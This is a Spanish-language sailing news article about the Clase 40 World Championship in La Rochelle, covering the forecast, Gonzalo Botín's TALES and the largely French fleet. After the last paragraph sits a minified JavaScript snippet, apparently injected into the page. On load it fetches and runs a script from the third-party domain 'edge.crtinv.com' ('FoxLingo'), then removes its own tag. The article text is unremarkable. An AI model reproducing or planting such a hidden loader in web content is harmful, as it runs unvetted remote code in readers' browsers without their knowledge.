Mundial CLASE 40 se disputa en La Rochelle hasta el sábado
Por Dury Alçonso.
Cuatro días de competición en la costa atlántica francesa. Participa el TALES de Gonzalo Botín, campeón del mundo en 2010. Acuden dieciocho Clase 40, mayoría francesa.
Del 2 al 6 de octubre en La Rochelle. Serán los días en los que se celebre el Campeonato del Mundo de la Clase 40, veleros monocasco diseñados bajo una “box rule”. La Organización correrá a cargo de la Clase 40 y la Socieéte Des Régatas Rochelaises.
La primera jornada dedicada a mediciones, a partir de las diez de la mañana de hoy pruebas todos los días hasta el sábado. Pudiendo ser recorrido barlovento-sotavento, costeros o de altura; en función de las condiciones meteorológicas.
Meteo con Jean-Yves Bernot. La primera en la frente porque la llegada de una borrasca ártica trae viento para dar y tomar, eso es lo que les habrá explicado ayer Bernot en la sesión de meteorología. Se prevé vientos del tercer cuadrante de veinte a treinta nudos de intensidad, y si le sumamos la mar que se puede formar en la costa de La Rochelle, van a tener unos días moviditos a bordo de los Clase 40.
Repite el TALES de Gonzalo Botín. Después de haber logrado el campeonato del mundo en 2010 y el subcampeonato en 2008 y 2011, este último en Gijón; el patrón santanderino vuelve a participar en el Mundial Clase 40 con su velero TALES, un Akilaria 40 diseño de Lombard.
Gonzalo es el único patrón español en la Clase 40, ya lleva sus años. Una Clase con más de setenta asociados, formada por armadores. En breve contara con un nuevo Clase 40 construido en España. Por ahora intentara volver a ganar el Mundial de la Clase.
Por cierto, este Mundial Clase 40 es con tripulación. Habitualmente los Clase 40 participan en regatas transoceánicas de solitarios y en A Dos, como la Route du Rhum o la Transat, etc.
Casi una veintena de Clase 40. Esta siendo lo habitual en los mundiales de la clase, e que acudan entre quince o cerca de veinte veleros. Destacar la presencia del Campeón del Mundo 2011, Aloys Le Clain y del tercer clasificado Thierry Bouchard con el Comiris – Elior Santé.
No estará entre ellos uno de los grandes de la Clase 40: Tanguy De Lamotte, que está inscrito en la próxima Vendée Globe. Tanguy ha ganado muchas regatas transoceánicas de la Clase 40, pero ha tomado la decisión de dar un paso mayor al participar en la vuelta al mundo a vela en solitario el próximo día 10 de noviembre desde Le Sables d´Olonne.
Menos Gonzalo Botín, y otros tres patrones, el resto son franceses, seguro que de pura cepa. A ver como se lo cocinan los próximos días
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();